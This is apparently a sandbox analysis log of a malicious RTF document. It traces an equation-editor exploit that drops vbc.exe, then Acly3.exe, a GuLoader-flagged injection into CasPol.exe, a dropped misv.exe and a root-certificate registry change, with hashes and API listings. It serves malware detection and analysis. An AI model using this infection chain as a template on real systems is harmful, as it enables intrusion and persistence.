            Source: C:\Users\Public\vbc.exeCode function: 3_2_004056DE GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,3_2_004056DE

            System Summary:

            barindex
            Office equation editor drops PE fileShow sources
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
            Source: C:\Users\Public\vbc.exeCode function: 3_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,3_2_0040352D
            Source: C:\Users\Public\vbc.exeCode function: 3_2_0040755C3_2_0040755C
            Source: C:\Users\Public\vbc.exeCode function: 3_2_00406D853_2_00406D85
            Source: C:\Users\user\AppData\Local\Temp\Acly3.exeCode function: 4_2_004017244_2_00401724
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_00573C069_2_00573C06
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_0056C6DF9_2_0056C6DF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_005698599_2_00569859
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_0056A0429_2_0056A042
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_00569C4D9_2_00569C4D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_0056BC4B9_2_0056BC4B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_005718779_2_00571877
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_005694659_2_00569465
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_00569C1F9_2_00569C1F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_0056980E9_2_0056980E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_005694319_2_00569431
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_0056BC209_2_0056BC20
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_0056A42F9_2_0056A42F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_00569CD79_2_00569CD7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_005694D59_2_005694D5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_005720CA9_2_005720CA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_0056A4E39_2_0056A4E3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_0056A0E99_2_0056A0E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_0056A0829_2_0056A082
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_00568C8A9_2_00568C8A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_005698BD9_2_005698BD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_005691519_2_00569151
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_0057095C9_2_0057095C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_0056997D9_2_0056997D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_0056A56C9_2_0056A56C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_0056916D9_2_0056916D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_0056A16D9_2_0056A16D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_00569D1B9_2_00569D1B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_005699099_2_00569909
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_005695389_2_00569538
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_005699D69_2_005699D6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_005691D79_2_005691D7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_0056C1C89_2_0056C1C8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_0056A5E79_2_0056A5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_00569DEF9_2_00569DEF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_00569D879_2_00569D87
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_005695A69_2_005695A6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_0056A1A39_2_0056A1A3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_0056A64A9_2_0056A64A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_00569A4B9_2_00569A4B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_0056A2669_2_0056A266
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_0056923F9_2_0056923F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_00569E389_2_00569E38
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_0056962D9_2_0056962D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_00568A2A9_2_00568A2A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_00569AF69_2_00569AF6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_0056A2F69_2_0056A2F6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_005696969_2_00569696
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_0056A6939_2_0056A693
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_00569A9E9_2_00569A9E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_0056A2869_2_0056A286
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_005692A09_2_005692A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_00569EA19_2_00569EA1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_00569B519_2_00569B51
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_005697409_2_00569740
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_0056A3789_2_0056A378
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_00569F6E9_2_00569F6E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_0056BB6C9_2_0056BB6C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_0056976D9_2_0056976D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_0056BB6A9_2_0056BB6A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_00569F159_2_00569F15
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_005693349_2_00569334
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_005723329_2_00572332
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_0056BBD69_2_0056BBD6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_0056A3CE9_2_0056A3CE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_00569BC99_2_00569BC9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_00569FC99_2_00569FC9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_0056979C9_2_0056979C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_005603819_2_00560381
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_0056938D9_2_0056938D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_00569BA09_2_00569BA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_0056BBA09_2_0056BBA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_005735BC NtProtectVirtualMemory,9_2_005735BC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_0056C6DF NtAllocateVirtualMemory,9_2_0056C6DF
            Source: ~WRF{F8012674-B7CB-458D-8650-A31E79A66D61}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess Stats: CPU usage > 98%
            Source: C:\Users\user\AppData\Local\Temp\Acly3.exeProcess Stats: CPU usage > 98%
            Source: Acly3.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe C6F93EB69924750ADBE61115B2D6A200D534E783C6BD4CA0E2C0CD2969E9469E
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\Acly3.exe 7C9AEB4763912BE27C0B5CFE843642E4424902DD2EEFB1AD2DF6092EBF10A468
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\misv.exe 6D624544826CC99182030BB50757944FEE3734EA01E8C37A77A22214BFF4B9DF
            Source: Joe Sandbox ViewDropped File: C:\Users\Public\vbc.exe C6F93EB69924750ADBE61115B2D6A200D534E783C6BD4CA0E2C0CD2969E9469E
            Source: C:\Users\Public\vbc.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
            Source: C:\Users\Public\vbc.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Acly3.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Acly3.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
            Source: C:\Users\user\AppData\Roaming\misv.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
            Source: C:\Users\user\AppData\Roaming\misv.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
            Source: T81Ip9NCGi.rtfReversingLabs: Detection: 35%
            Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Acly3.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
            Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
            Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
            Source: C:\Users\Public\vbc.exeProcess created: C:\Users\user\AppData\Local\Temp\Acly3.exe C:\Users\user\AppData\Local\Temp\Acly3.exe
            Source: C:\Users\user\AppData\Local\Temp\Acly3.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\user\AppData\Local\Temp\Acly3.exe
            Source: C:\Users\user\AppData\Local\Temp\Acly3.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\user\AppData\Local\Temp\Acly3.exe
            Source: C:\Users\user\AppData\Local\Temp\Acly3.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\user\AppData\Local\Temp\Acly3.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Users\user\AppData\Roaming\misv.exe "C:\Users\user\AppData\Roaming\misv.exe"
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe" Jump to behavior
            Source: C:\Users\Public\vbc.exeProcess created: C:\Users\user\AppData\Local\Temp\Acly3.exe C:\Users\user\AppData\Local\Temp\Acly3.exeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Acly3.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\user\AppData\Local\Temp\Acly3.exeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Acly3.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\user\AppData\Local\Temp\Acly3.exeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Acly3.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\user\AppData\Local\Temp\Acly3.exeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Users\user\AppData\Roaming\misv.exe "C:\Users\user\AppData\Roaming\misv.exe" Jump to behavior
            Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32Jump to behavior
            Source: C:\Users\Public\vbc.exeCode function: 3_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,3_2_0040352D
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$1Ip9NCGi.rtfJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRDC0C.tmpJump to behavior
            Source: classification engineClassification label: mal100.troj.expl.evad.winRTF@14/13@3/1
            Source: C:\Users\Public\vbc.exeCode function: 3_2_004021AA CoCreateInstance,3_2_004021AA
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\Public\vbc.exeCode function: 3_2_0040498A GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,3_2_0040498A
            Source: CasPol.exe, 00000009.00000002.687534947.000000001E1D0000.00000002.00020000.sdmpBinary or memory string: .VBPud<_
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
            Source: Binary string: C:\Program Files (x86)\Administrator-Cloud\Projects\Acly3.pdb source: vbc.exe, 00000003.00000002.416790388.000000000040D000.00000004.00020000.sdmp, vbc.exe, 00000003.00000002.416819547.0000000000427000.00000004.00020000.sdmp, Acly3.exe.3.dr
            Source: ~WRF{F8012674-B7CB-458D-8650-A31E79A66D61}.tmp.0.drInitial sample: OLE indicators vbamacros = False

            Data Obfuscation:

            barindex
            Yara detected GuLoaderShow sources
            Source: Yara matchFile source: 00000004.00000002.679995330.00000000003E0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.679892617.0000000000560000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000000.560395041.0000000000560000.00000040.00000001.sdmp, type: MEMORY
            Source: C:\Users\user\AppData\Local\Temp\Acly3.exeCode function: 4_2_003E1E1A push edi; iretd 4_2_003E1E1C
            Source: C:\Users\user\AppData\Local\Temp\Acly3.exeCode function: 4_2_003E416D pushfd ; ret 4_2_003E4171
            Source: C:\Users\user\AppData\Local\Temp\Acly3.exeCode function: 4_2_003E2A8B pushfd ; retf 4_2_003E2A8D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_0056CCF0 push dword ptr [edx]; retn 5B3Bh9_2_0056DE5F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_00562A5E pushad ; ret 9_2_00562A61
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile created: C:\Users\user\AppData\Roaming\misv.exeJump to dropped file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
            Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\Acly3.exeJump to dropped file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

            Boot Survival:

            barindex
            Drops PE files to the user root directoryShow sources
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOTJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Acly3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Acly3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Acly3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Acly3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Acly3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Acly3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
